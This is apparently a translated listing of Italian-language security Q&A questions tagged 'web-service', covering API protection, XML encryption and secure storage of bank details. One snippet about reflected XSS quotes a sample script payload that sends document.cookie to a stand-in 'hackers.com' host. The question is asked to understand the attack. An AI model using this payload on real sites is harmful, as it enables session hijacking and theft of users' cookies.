Domande con tag 'web-service'

domande con tag
1
risposta

Come proteggere le richieste alla mia API dal mio widget web incorporato nel sito web di terze parti

Sfondo Sto progettando un widget Web per un nuovo SaaS per l'incorporamento in un CMS protetto da password. Ciò consentirebbe al cliente di aggiungere qualcosa come il seguente a tutte le pagine del proprio CMS per visualizzare alcune informa...
posta 05.06.2015 - 15:35
2
risposte

Che cos'è s3.amazonaws.com e perché Chrome lo blocca?

Ultimamente, ogni volta che faccio clic su un link per il download in Google Chrome, questo reindirizza a un altro link che inizia con s3.amazonaws.com , che a sua volta viene bloccato da Chrome o dal mio Antivirus (Comodo Internet Security)...
posta 05.04.2015 - 02:17
2
risposte

Qualcuno usa XML Encryption?

Lo standard XML definisce un meccanismo per crittografare i dati in un documento XML. È parte dello standard . Qualcuno usa questo formato di crittografia XML? Esistono sistemi distribuiti significativi che utilizzano la crittografia XML? Vi...
posta 14.10.2012 - 22:00
1
risposta

Attacco XSS riflesso tramite richiesta POST e payload XML

So che un XSS riflesso può essere fatto con una richiesta GET come: http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script> Finché la risposta è simile a questa: <html>...
posta 15.09.2013 - 22:30
1
risposta

Design API PHP semplice e sicuro

Sto provando a progettare un servizio web RESTful API sicuro con il minor numero di parti mobili possibile. Ho alcune domande e voglio assicurarmi che il mio design sia sicuro. Per il livello di sicurezza della trasmissione dei dati, userò SS...
posta 04.04.2016 - 22:22
3
risposte

Sicurezza end-to-end per i servizi REST, eventuali standard emergenti?

Lavoro con l'integrazione nel settore sanitario, dove la sicurezza end-to-end è importante. Ci integriamo con numerosi servizi SOAP e usiamo le funzionalità di sicurezza WS per crittografare e firmare richieste e risposte. Le richieste e le r...
posta 12.10.2015 - 15:14
1
risposta

Mostrando il numero di conto corrente bancario / account e archiviandoli in modo sicuro

EDIT: questo è per la regione UK / Europa. Mi sono grattato la testa leggendo altri post simili a questo riguardo alla memorizzazione sicura del routing della banca e dei numeri di conto. So che i numeri di routing possono essere in chiaro in...
posta 27.04.2015 - 13:09
2
risposte

Esiste un foglio di calcolo / modello per la mappatura delle regole di autorizzazione dei servizi Web?

Sto cercando un foglio di lavoro / modello che consenta la mappatura, la visualizzazione e l'analisi delle regole di business (ad esempio "chi ha accesso a cosa") In passato ne ho creati un paio (alcuni anche con l'automazione utilizzando la...
posta 04.05.2012 - 11:49
6
risposte

Perché qualcuno dovrebbe voler cifrare i feed RSS?

Ho sentito l'idea di crittografare i feed RSS utilizzando il sistema di crittografia a chiave pubblica di qualcuno e da allora mi ha incuriosito l'idea. Ma poi ho iniziato a chiedermi quale sarebbe stata la necessità fondamentale per qualcuno di...
posta 07.01.2013 - 12:39
3
risposte

servizi web: come impedire accessi illegali

Come suggerito da qualcuno, posto una domanda qui (per la prima volta). Sto usando i servizi web da un'applicazione Android. Io uso https (ho comprato un certificato SSL). Voglio impedire accessi indesiderati da parte di altri che conoscono l...
posta 13.02.2013 - 16:39